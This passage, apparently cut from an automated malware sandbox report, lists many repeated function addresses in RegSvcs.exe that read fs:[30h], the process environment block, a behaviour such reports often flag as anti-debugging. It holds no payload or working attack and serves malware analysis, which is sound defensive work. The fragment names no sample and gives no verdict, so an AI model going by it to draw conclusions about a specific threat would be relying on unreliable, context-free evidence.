                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]10_2_014A6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A430 mov eax, dword ptr fs:[00000030h]10_2_0145A430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014204E5 mov ecx, dword ptr fs:[00000030h]10_2_014204E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014264AB mov eax, dword ptr fs:[00000030h]10_2_014264AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014544B0 mov ecx, dword ptr fs:[00000030h]10_2_014544B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AA4B0 mov eax, dword ptr fs:[00000030h]10_2_014AA4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145674D mov esi, dword ptr fs:[00000030h]10_2_0145674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145674D mov eax, dword ptr fs:[00000030h]10_2_0145674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145674D mov eax, dword ptr fs:[00000030h]10_2_0145674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420750 mov eax, dword ptr fs:[00000030h]10_2_01420750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462750 mov eax, dword ptr fs:[00000030h]10_2_01462750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462750 mov eax, dword ptr fs:[00000030h]10_2_01462750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AE75D mov eax, dword ptr fs:[00000030h]10_2_014AE75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A4755 mov eax, dword ptr fs:[00000030h]10_2_014A4755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428770 mov eax, dword ptr fs:[00000030h]10_2_01428770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01430770 mov eax, dword ptr fs:[00000030h]10_2_01430770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C700 mov eax, dword ptr fs:[00000030h]10_2_0145C700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420710 mov eax, dword ptr fs:[00000030h]10_2_01420710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01450710 mov eax, dword ptr fs:[00000030h]10_2_01450710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C720 mov eax, dword ptr fs:[00000030h]10_2_0145C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C720 mov eax, dword ptr fs:[00000030h]10_2_0145C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145273C mov eax, dword ptr fs:[00000030h]10_2_0145273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145273C mov ecx, dword ptr fs:[00000030h]10_2_0145273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145273C mov eax, dword ptr fs:[00000030h]10_2_0145273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149C730 mov eax, dword ptr fs:[00000030h]10_2_0149C730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142C7C0 mov eax, dword ptr fs:[00000030h]10_2_0142C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A07C3 mov eax, dword ptr fs:[00000030h]10_2_014A07C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]10_2_014427ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]10_2_014427ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014427ED mov eax, dword ptr fs:[00000030h]10_2_014427ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AE7E1 mov eax, dword ptr fs:[00000030h]10_2_014AE7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014247FB mov eax, dword ptr fs:[00000030h]10_2_014247FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014247FB mov eax, dword ptr fs:[00000030h]10_2_014247FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C678E mov eax, dword ptr fs:[00000030h]10_2_014C678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014207AF mov eax, dword ptr fs:[00000030h]10_2_014207AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143C640 mov eax, dword ptr fs:[00000030h]10_2_0143C640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E866E mov eax, dword ptr fs:[00000030h]10_2_014E866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E866E mov eax, dword ptr fs:[00000030h]10_2_014E866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A660 mov eax, dword ptr fs:[00000030h]10_2_0145A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A660 mov eax, dword ptr fs:[00000030h]10_2_0145A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01452674 mov eax, dword ptr fs:[00000030h]10_2_01452674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E609 mov eax, dword ptr fs:[00000030h]10_2_0149E609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143260B mov eax, dword ptr fs:[00000030h]10_2_0143260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01462619 mov eax, dword ptr fs:[00000030h]10_2_01462619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0143E627 mov eax, dword ptr fs:[00000030h]10_2_0143E627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01456620 mov eax, dword ptr fs:[00000030h]10_2_01456620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01458620 mov eax, dword ptr fs:[00000030h]10_2_01458620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142262C mov eax, dword ptr fs:[00000030h]10_2_0142262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A6C7 mov ebx, dword ptr fs:[00000030h]10_2_0145A6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A6C7 mov eax, dword ptr fs:[00000030h]10_2_0145A6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]10_2_0149E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]10_2_0149E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]10_2_0149E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E6F2 mov eax, dword ptr fs:[00000030h]10_2_0149E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A06F1 mov eax, dword ptr fs:[00000030h]10_2_014A06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A06F1 mov eax, dword ptr fs:[00000030h]10_2_014A06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424690 mov eax, dword ptr fs:[00000030h]10_2_01424690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424690 mov eax, dword ptr fs:[00000030h]10_2_01424690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C6A6 mov eax, dword ptr fs:[00000030h]10_2_0145C6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014566B0 mov eax, dword ptr fs:[00000030h]10_2_014566B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A0946 mov eax, dword ptr fs:[00000030h]10_2_014A0946
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]10_2_01446962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]10_2_01446962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01446962 mov eax, dword ptr fs:[00000030h]10_2_01446962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146096E mov eax, dword ptr fs:[00000030h]10_2_0146096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146096E mov edx, dword ptr fs:[00000030h]10_2_0146096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0146096E mov eax, dword ptr fs:[00000030h]10_2_0146096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C4978 mov eax, dword ptr fs:[00000030h]10_2_014C4978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C4978 mov eax, dword ptr fs:[00000030h]10_2_014C4978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AC97C mov eax, dword ptr fs:[00000030h]10_2_014AC97C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E908 mov eax, dword ptr fs:[00000030h]10_2_0149E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149E908 mov eax, dword ptr fs:[00000030h]10_2_0149E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AC912 mov eax, dword ptr fs:[00000030h]10_2_014AC912
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01418918 mov eax, dword ptr fs:[00000030h]10_2_01418918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01418918 mov eax, dword ptr fs:[00000030h]10_2_01418918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A892A mov eax, dword ptr fs:[00000030h]10_2_014A892A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B892B mov eax, dword ptr fs:[00000030h]10_2_014B892B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B69C0 mov eax, dword ptr fs:[00000030h]10_2_014B69C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0142A9D0 mov eax, dword ptr fs:[00000030h]10_2_0142A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014549D0 mov eax, dword ptr fs:[00000030h]10_2_014549D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EA9D3 mov eax, dword ptr fs:[00000030h]10_2_014EA9D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AE9E0 mov eax, dword ptr fs:[00000030h]10_2_014AE9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014529F9 mov eax, dword ptr fs:[00000030h]10_2_014529F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014529F9 mov eax, dword ptr fs:[00000030h]10_2_014529F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014329A0 mov eax, dword ptr fs:[00000030h]10_2_014329A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014209AD mov eax, dword ptr fs:[00000030h]10_2_014209AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014209AD mov eax, dword ptr fs:[00000030h]10_2_014209AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A89B3 mov esi, dword ptr fs:[00000030h]10_2_014A89B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A89B3 mov eax, dword ptr fs:[00000030h]10_2_014A89B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014A89B3 mov eax, dword ptr fs:[00000030h]10_2_014A89B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01432840 mov ecx, dword ptr fs:[00000030h]10_2_01432840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01450854 mov eax, dword ptr fs:[00000030h]10_2_01450854
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424859 mov eax, dword ptr fs:[00000030h]10_2_01424859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01424859 mov eax, dword ptr fs:[00000030h]10_2_01424859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AE872 mov eax, dword ptr fs:[00000030h]10_2_014AE872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AE872 mov eax, dword ptr fs:[00000030h]10_2_014AE872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6870 mov eax, dword ptr fs:[00000030h]10_2_014B6870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6870 mov eax, dword ptr fs:[00000030h]10_2_014B6870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AC810 mov eax, dword ptr fs:[00000030h]10_2_014AC810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov ecx, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01442835 mov eax, dword ptr fs:[00000030h]10_2_01442835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145A830 mov eax, dword ptr fs:[00000030h]10_2_0145A830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C483A mov eax, dword ptr fs:[00000030h]10_2_014C483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C483A mov eax, dword ptr fs:[00000030h]10_2_014C483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144E8C0 mov eax, dword ptr fs:[00000030h]10_2_0144E8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EA8E4 mov eax, dword ptr fs:[00000030h]10_2_014EA8E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C8F9 mov eax, dword ptr fs:[00000030h]10_2_0145C8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0145C8F9 mov eax, dword ptr fs:[00000030h]10_2_0145C8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420887 mov eax, dword ptr fs:[00000030h]10_2_01420887
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014AC89D mov eax, dword ptr fs:[00000030h]10_2_014AC89D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6B40 mov eax, dword ptr fs:[00000030h]10_2_014B6B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014B6B40 mov eax, dword ptr fs:[00000030h]10_2_014B6B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014EAB40 mov eax, dword ptr fs:[00000030h]10_2_014EAB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014C8B42 mov eax, dword ptr fs:[00000030h]10_2_014C8B42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0141CB7E mov eax, dword ptr fs:[00000030h]10_2_0141CB7E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0149EB1D mov eax, dword ptr fs:[00000030h]10_2_0149EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144EB20 mov eax, dword ptr fs:[00000030h]10_2_0144EB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144EB20 mov eax, dword ptr fs:[00000030h]10_2_0144EB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E8B28 mov eax, dword ptr fs:[00000030h]10_2_014E8B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014E8B28 mov eax, dword ptr fs:[00000030h]10_2_014E8B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]10_2_01440BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]10_2_01440BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01440BCB mov eax, dword ptr fs:[00000030h]10_2_01440BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]10_2_01420BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]10_2_01420BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01420BCD mov eax, dword ptr fs:[00000030h]10_2_01420BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_014CEBD0 mov eax, dword ptr fs:[00000030h]10_2_014CEBD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]10_2_01428BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]10_2_01428BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01428BF0 mov eax, dword ptr fs:[00000030h]10_2_01428BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0144EBFC mov eax, dword ptr fs:[00000030h]10_2_0144EBFC
